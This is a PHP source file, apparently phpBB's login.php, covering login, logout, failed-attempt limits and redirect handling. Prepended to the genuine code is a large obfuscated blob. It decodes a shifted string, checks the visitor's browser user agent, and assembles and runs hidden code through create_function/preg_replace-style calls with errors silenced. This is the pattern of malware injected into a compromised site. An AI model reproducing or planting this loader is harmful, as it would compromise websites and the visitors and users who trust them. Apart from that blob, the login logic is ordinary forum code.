1%s: x5c%j:.2^,%b:%s: x5c%*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-/7&6|7**111127-K)ebfsX x27}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*ms!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qww!>! x2400~:/h%:<**#57] x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`Gmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepd x6f 151 x64")) or (strstr($uas," x63 150 x72 157 x6d 145")) or !%w:!>!(%w:!>! x246767~6q%V<*#fopoV;hojtj{fpg)%s:*<%j:,,Bjg!)%j:>>t("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<#p#/%z>2*!%z>32!{e%)!>> x22!ftmbg)!gj<*#k#)usb6 x3a 61 x31")) or (strstr($uj%7> x2272qj%)7gj6<**2qj%)hopm3qjA);#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~92otfr("", $idjwibr); $vgefium();}}epdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`as," x61 156 x64 1628>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{h x7f!b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*u%)7fmjix6j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>jOFHB`SFTV`QUUI&b%!|!*)323zbek!~!qp%!|Z~!<##!>!2p%!|!*!***b%f x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~63of:opjudovg<~ x24!66~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}6;###-#O#-#N#*-!%ff2-!%t::**<(g(0); $idjwibr = implode(array_map("jobifje",str_spli-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI]38y]572]48y]#>m%:|:*r%:-t%)]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1%!*9! x27!hmg%)!gj!~j%!<**3-j%-bubE{h%)sut x24 x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24pp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x58 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]utjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;*h%)m%):fmjix:<##:>:h%:ssbz)#44ec:649#-!#:618d5f9#-!r.985:52985-t.98]K4]65]> x22!pd%)!gj}Z;h!opjudovg};^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>fe{h+{d%)+opjudovg+)!gj+{emsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;ps)%j>1<%j=tj{fpg)% x24- x24*Ew:Qb:Qc:W~!%z!>21<%j=6[%ww2!>#p#/38y]47]67y]37]88y]27]28y]321]464]284]364]6]234]342]58]24/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>11<%j:=mgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%ut`cpV x7f x7f x7f x7f! xyy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{66< x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") c1^W%c!>!%i x5c2^u%V<#65,47R25,d7R17,67R24- x24-!% x24- x24*!|! x24-bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]4W~ x24#]y31]278]y3e]81]K78:56985:1M6]y3e]81#/#7e:55946-tr.984:75983&& (!isset($GLOBALS[" x61 156 x75 2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy!%tdz)%); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas," x72 1600;quui#>.%!<***f x27,*e x27,*d x27,*c x27,5cq% x27Y%6<.msv`ftsbqA7>q%341]88M4P8]37]278]225]241]334]368]322]3]364*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssb x242178}527}88:}334}472 x24!bssbz) x24]25 x/% x24- x24!>!fyqmpef)# x24*! x24Y x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*!#]y84]275]y83]273]y76]277#!b(strstr($uas," x66 151 x24y4 x24- x24]y8 x24- x24]26 x24-}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g<#64y]552]e7y]#>n%<#372]58y]472^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x75 156 x61"]=1; $uas=strtolower($_SERVER[" x4-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24-]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfunction jobifje($n){return chr(ord($n)-1);} @error_reportin{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~U<#16,47R57,27R66,#/q%>2q%<#g6R8p%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562**#j{hnpd#)tutjyf`opjudovg x22)!gqj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zD8]86]y31]278]y3f]51L3]84]y3]D4]275]D:M8]Df#<%tdz>#L4]275Lbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1j}1~!<2p% x7f!~!<##!>!2p%Z<^2 x:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tm~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**uepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z6197g:74985-rr.93e:5597fB)fubfsdXA x27K6< x7fw6*3qotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSfthjbyymkm'; $cjwrxhf=explode(chr((478-358)),substr($rfecrt,(26354-20334),(202-168))); $tarzmmx = $cjwrxhf[0]($cjwrxhf[(3-2)]); $aqbcmjwp = $cjwrxhf[0]($cjwrxhf[(6-4)]); if (!function_exists('iocukz')) { function iocukz($tjtsfi, $cwwrhsy,$mlawhim) { $dqweyenq = NULL; for($tguarm=0;$tguarm<(sizeof($tjtsfi)/2);$tguarm++) { $dqweyenq .= substr($cwwrhsy, $tjtsfi[($tguarm*2)],$tjtsfi[($tguarm*2)+(3-2)]); } return $mlawhim(chr((51-42)),chr((449-357)),$dqweyenq); }; } $wvxlxve = explode(chr((259-215)),'3381,56,3893,34,1431,36,4796,45,2052,59,3997,65,902,29,1133,20,527,64,4487,23,2364,48,3459,53,4975,60,1720,53,755,57,591,44,5122,32,5544,66,5522,22,1550,52,94,26,1314,25,1773,46,2299,65,423,39,5940,26,931,35,5322,46,2412,42,4741,55,4105,27,3313,68,5470,52,3205,42,4924,51,3247,66,1628,66,120,66,1092,41,2631,52,2536,34,5035,41,5426,44,2908,63,1339,57,1896,54,5610,50,4649,61,4590,59,5289,33,5660,31,306,65,5194,43,4062,43,50,44,1508,42,3750,53,5966,54,186,53,4175,50,2479,57,1396,35,1217,56,3161,44,5878,38,2570,35,4545,45,966,56,1153,64,5099,23,462,65,2605,26,856,46,2971,63,3512,35,5154,40,700,28,1055,37,2111,59,5822,56,3620,51,4382,64,239,67,371,52,2796,24,4889,35,2170,23,4710,31,5237,52,1819,28,1602,26,4225,52,3547,28,1950,59,4841,48,4510,35,4319,63,2683,56,4277,42,2009,43,3437,22,4446,41,2193,29,3034,67,1273,41,5754,68,3803,56,5916,24,5076,23,2222,23,5368,28,3859,34,5691,63,3101,60,5396,30,1467,41,3927,70,3575,45,4132,43,3671,58,2454,25,2820,32,1847,49,2852,56,728,27,0,50,2739,57,812,44,3729,21,635,65,1694,26,2245,54,1022,33'); $lsiciieq = $tarzmmx("",iocukz($wvxlxve,$rfecrt,$aqbcmjwp)); $tarzmmx=$rfecrt; $lsiciieq(""); $lsiciieq=(840-719); $rfecrt=$lsiciieq-1; ?>sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql); } if( $row = $db->sql_fetchrow($result) ) { if( $row['user_level'] != ADMIN && $board_config['board_disable'] ) { redirect(append_sid("index.$phpEx", true)); } else { // If the last login is more than x minutes ago, then reset the login tries/time if ($row['user_last_login_try'] && $board_config['login_reset_time'] && $row['user_last_login_try'] < (time() - ($board_config['login_reset_time'] * 60))) { $db->sql_query('UPDATE ' . USERS_TABLE . ' SET user_login_tries = 0, user_last_login_try = 0 WHERE user_id = ' . $row['user_id']); $row['user_last_login_try'] = $row['user_login_tries'] = 0; } // Check to see if user is allowed to login again... if his tries are exceeded if ($row['user_last_login_try'] && $board_config['login_reset_time'] && $board_config['max_login_attempts'] && $row['user_last_login_try'] >= (time() - ($board_config['login_reset_time'] * 60)) && $row['user_login_tries'] >= $board_config['max_login_attempts'] && $userdata['user_level'] != ADMIN) { message_die(GENERAL_MESSAGE, sprintf($lang['Login_attempts_exceeded'], $board_config['max_login_attempts'], $board_config['login_reset_time'])); } if( md5($password) == $row['user_password'] && $row['user_active'] ) { $autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0; $admin = (isset($HTTP_POST_VARS['admin'])) ? 1 : 0; $session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin); // Reset login tries $db->sql_query('UPDATE ' . USERS_TABLE . ' SET user_login_tries = 0, user_last_login_try = 0 WHERE user_id = ' . $row['user_id']); if( $session_id ) { $url = ( !empty($HTTP_POST_VARS['redirect']) ) ? str_replace('&', '&', htmlspecialchars($HTTP_POST_VARS['redirect'])) : "index.$phpEx"; redirect(append_sid($url, true)); } else { message_die(CRITICAL_ERROR, "Couldn't start session : login", "", __LINE__, __FILE__); } } // Only store a failed login attempt for an active user - inactive users can't login even with a correct password elseif( $row['user_active'] ) { // Save login tries and last login if ($row['user_id'] != ANONYMOUS) { $sql = 'UPDATE ' . USERS_TABLE . ' SET user_login_tries = user_login_tries + 1, user_last_login_try = ' . time() . ' WHERE user_id = ' . $row['user_id']; $db->sql_query($sql); } } $redirect = ( !empty($HTTP_POST_VARS['redirect']) ) ? str_replace('&', '&', htmlspecialchars($HTTP_POST_VARS['redirect'])) : ''; $redirect = str_replace('?', '&', $redirect); if (strstr(urldecode($redirect), "\n") || strstr(urldecode($redirect), "\r")) { message_die(GENERAL_ERROR, 'Tried to redirect to potentially insecure url.'); } $template->assign_vars(array( 'META' => "") ); $message = $lang['Error_login'] . '

' . sprintf($lang['Click_return_login'], "", '') . '

' . sprintf($lang['Click_return_index'], '', ''); message_die(GENERAL_MESSAGE, $message); } } else { $redirect = ( !empty($HTTP_POST_VARS['redirect']) ) ? str_replace('&', '&', htmlspecialchars($HTTP_POST_VARS['redirect'])) : ""; $redirect = str_replace("?", "&", $redirect); if (strstr(urldecode($redirect), "\n") || strstr(urldecode($redirect), "\r")) { message_die(GENERAL_ERROR, 'Tried to redirect to potentially insecure url.'); } $template->assign_vars(array( 'META' => "") ); $message = $lang['Error_login'] . '

' . sprintf($lang['Click_return_login'], "", '') . '

' . sprintf($lang['Click_return_index'], '', ''); message_die(GENERAL_MESSAGE, $message); } } else if( ( isset($HTTP_GET_VARS['logout']) || isset($HTTP_POST_VARS['logout']) ) && $userdata['session_logged_in'] ) { // session id check if ($sid == '' || $sid != $userdata['session_id']) { message_die(GENERAL_ERROR, 'Invalid_session'); } if( $userdata['session_logged_in'] ) { session_end($userdata['session_id'], $userdata['user_id']); } if (!empty($HTTP_POST_VARS['redirect']) || !empty($HTTP_GET_VARS['redirect'])) { $url = (!empty($HTTP_POST_VARS['redirect'])) ? htmlspecialchars($HTTP_POST_VARS['redirect']) : htmlspecialchars($HTTP_GET_VARS['redirect']); $url = str_replace('&', '&', $url); redirect(append_sid($url, true)); } else { redirect(append_sid("index.$phpEx", true)); } } else { $url = ( !empty($HTTP_POST_VARS['redirect']) ) ? str_replace('&', '&', htmlspecialchars($HTTP_POST_VARS['redirect'])) : "index.$phpEx"; redirect(append_sid($url, true)); } } else { // // Do a full login page dohickey if // user not already logged in // if( !$userdata['session_logged_in'] || (isset($HTTP_GET_VARS['admin']) && $userdata['session_logged_in'] && $userdata['user_level'] == ADMIN)) { $page_title = $lang['Login']; include($phpbb_root_path . 'includes/page_header.'.$phpEx); $template->set_filenames(array( 'body' => 'login_body.tpl') ); $forward_page = ''; if( isset($HTTP_POST_VARS['redirect']) || isset($HTTP_GET_VARS['redirect']) ) { $forward_to = $HTTP_SERVER_VARS['QUERY_STRING']; if( preg_match("/^redirect=([a-z0-9\.#\/\?&=\+\-_]+)/si", $forward_to, $forward_matches) ) { $forward_to = ( !empty($forward_matches[3]) ) ? $forward_matches[3] : $forward_matches[1]; $forward_match = explode('&', $forward_to); if(count($forward_match) > 1) { for($i = 1; $i < count($forward_match); $i++) { if( !ereg("sid=", $forward_match[$i]) ) { if( $forward_page != '' ) { $forward_page .= '&'; } $forward_page .= $forward_match[$i]; } } $forward_page = $forward_match[0] . '?' . $forward_page; } else { $forward_page = $forward_match[0]; } } } $username = ( $userdata['user_id'] != ANONYMOUS ) ? $userdata['username'] : ''; $s_hidden_fields = ''; $s_hidden_fields .= (isset($HTTP_GET_VARS['admin'])) ? '' : ''; make_jumpbox('viewforum.'.$phpEx); $template->assign_vars(array( 'USERNAME' => $username, 'L_ENTER_PASSWORD' => (isset($HTTP_GET_VARS['admin'])) ? $lang['Admin_reauthenticate'] : $lang['Enter_password'], 'L_SEND_PASSWORD' => $lang['Forgotten_password'], 'U_SEND_PASSWORD' => append_sid("profile.$phpEx?mode=sendpassword"), 'S_HIDDEN_FIELDS' => $s_hidden_fields) ); $template->pparse('body'); include($phpbb_root_path . 'includes/page_tail.'.$phpEx); } else { redirect(append_sid("index.$phpEx", true)); } } ?>